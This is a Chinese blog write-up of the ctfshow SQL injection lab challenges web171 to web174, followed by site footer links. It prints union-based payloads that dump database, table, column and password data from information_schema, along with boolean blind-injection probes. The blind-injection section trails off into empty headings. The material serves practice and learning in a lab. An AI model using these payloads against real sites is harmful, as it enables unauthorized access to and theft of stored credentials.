SQL注入-1
From:
https://blog.csdn.net/qq_61237064/article/details/121421239
https://blog.csdn.net/weixin_48083470/article/details/119034415
1、web171
在网页中给出的用户表中可以看到ID=3后,数据无法显示,这说明有三个字段数
判断字段后,首先查询数据库名字: ctfshow_web
1' union select 1,2,database()--+
得到数据库后查询ctfshow_web
中的表名: ctfshow_user
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+
得到表名后查询 ctfshow_user
里的所有列名:id,username,password
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+
查询列名password中的数据即可:
1' union select 1,2,group_concat(password) from ctfshow_user--+
2、web172
同web171
3、web173
同web171
4、web174
查看返回逻辑,发现过滤了flag字符和数字,尝试布尔盲注
preg_match
执行匹配正则表达式
json_encode
对变量进行 JSON 编码
开始盲注
数据库长度判断
1' and length(database())<12 %23
在12的时候有显示,但是11就没有了说明,长度为11
数据库名字判断
1' and ascii(substr(database(),1,1))=99%23
第一个字符为c
1' and ascii(substr(database(),2,1))=116%23
第二个为t
ctfshow_web
数据库表名判断
数据库列名判断
password列下的内容
脚本
__EOF__

本文链接:https://www.cnblogs.com/zeroEMC/p/16394479.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现